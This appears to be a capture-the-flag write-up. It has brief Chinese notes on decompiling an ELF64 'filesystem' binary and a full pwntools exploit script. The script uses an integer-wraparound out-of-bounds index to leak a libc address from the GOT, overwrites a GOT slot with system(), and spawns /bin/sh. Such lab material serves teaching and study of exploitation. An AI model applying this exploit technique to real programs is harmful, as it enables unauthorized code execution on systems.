filesystem是一個ELF64檔案。
用IDA64打開並按F5反編譯:

先檢視Create下的函數(重命名為create()):
輕按兩下打開:
把0x10uLL切換成10進制:
0x6029E0 - 0x6020E0 = 0x900，即 16 個項目共佔 0x900 位元組，每個項目 0x90 位元組（後面計算越界索引時會用到這個步長）。
from pwn import *
from LibcSearcher import *
# Spawn the target locally; every helper below talks to this one tube.
sh = process(['./filesystem'])
def Create(filename):
    """Menu 'Create': pick the option, then answer the filename prompt.

    *filename* is sent exactly as given (bytes or str, no newline appended),
    which is what lets the exploit pass a raw packed integer as a "name".
    """
    exchange = (('> ', 'Create'), ('Filename: ', filename))
    for prompt, reply in exchange:
        sh.sendafter(prompt, reply)
def Edit(index, content):
    """Menu 'Edit': select entry *index* (sent as its decimal text) and
    push *content* as the entry's new data.

    No bounds check is applied on this side; the program's own check is
    exactly what the exploit is testing.
    """
    replies = [('> ', 'Edit'), ('Index:', str(index)), ('Content:', content)]
    for prompt, reply in replies:
        sh.sendafter(prompt, reply)
def Read(index):
    """Menu 'Read': ask the program to print entry *index*.

    Only the request is sent; the caller reads the 'Content: ' reply itself.
    """
    selection = str(index)
    for prompt, reply in (('> ', 'Read'), ('Index:', selection)):
        sh.sendafter(prompt, reply)
def Checksec(index):
    """Menu 'Checksec': request the program's own check on entry *index*.

    Defined for completeness; the exploit flow below does not call it.
    """
    selection = str(index)
    for prompt, reply in (('> ', 'Checksec'), ('Index:', selection)):
        sh.sendafter(prompt, reply)
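# libc offsets of the two symbols the exploit needs.  These are specific to
# one libc build (the writeup's target); on any other libc they must be
# re-resolved from the leaked setvbuf address (LibcSearcher is imported
# above for exactly that), otherwise the GOT write below lands on garbage.
setvbuf_libc = 0x6fe80
system_libc = 0x453a0

# Fill the table with 16 entries (0x900 bytes total per the offsets worked
# out above, i.e. presumably 0x90 bytes per entry).
for i in range(0x10):
    Create('a')
# gdb.attach(sh)  # uncomment to break here and inspect the table / GOT

# 17th entry ("+1"): its name is the raw packed value -2 rather than text.
# Presumably this corrupts the count/size bookkeeping so the oversized index
# below passes the bounds check -- confirm against the decompiled create().
Create(p64(0xfffffffffffffffe))

# Out-of-bounds access through 64-bit wraparound: with a 0x90-byte stride,
# 0x1c71c71c71c71c6 * 0x90 == 0xffffffffffffff60 (mod 2**64), so this
# "index" resolves to 0xa0 bytes *before* the table -- apparently inside the
# GOT, at setvbuf's slot.
WRAP_INDEX = 0x1c71c71c71c71c6
Read(WRAP_INDEX)
sh.recvuntil('Content: ')
# The reply after 'Content: ' is taken as the raw little-endian pointer
# (6 significant bytes).  A bytes pad (b'\x00') is required: under Python 3
# pwntools recv() returns bytes and bytes.ljust() rejects a str fill.
setvbuf_got = u64(sh.recv(6).ljust(8, b'\x00'))
log.success('setvbuf addr = %x' % setvbuf_got)
libc_base = setvbuf_got - setvbuf_libc
system_addr = libc_base + system_libc

# A libc mapping is page aligned.  A mis-aligned base means the leak or the
# hard-coded offsets do not match this target; fail here (log.error raises)
# rather than corrupt the GOT with a bogus address.
if libc_base & 0xfff:
    log.error('libc base 0x%x is not page aligned: wrong libc offsets?' % libc_base)
log.info('libc base = 0x%x, system = 0x%x' % (libc_base, system_addr))

# Write through the same wrapped index: the slot the leak came from
# (presumably setvbuf's GOT entry) gets a filler, and the slot right after it
# gets system().
Edit(WRAP_INDEX, p64(0xdeadbeef) + p64(system_addr))

# Trigger: enter Edit again but feed '/bin/sh' as the "index".  The
# overwritten slot is presumably the function that parses the index
# (e.g. atoi), so the call becomes system('/bin/sh').  Edit() is not used
# here because it would also wait for a 'Content:' prompt that never comes.
sh.sendafter('>', 'Edit')
sh.sendafter('Index:', '/bin/sh')
sh.interactive()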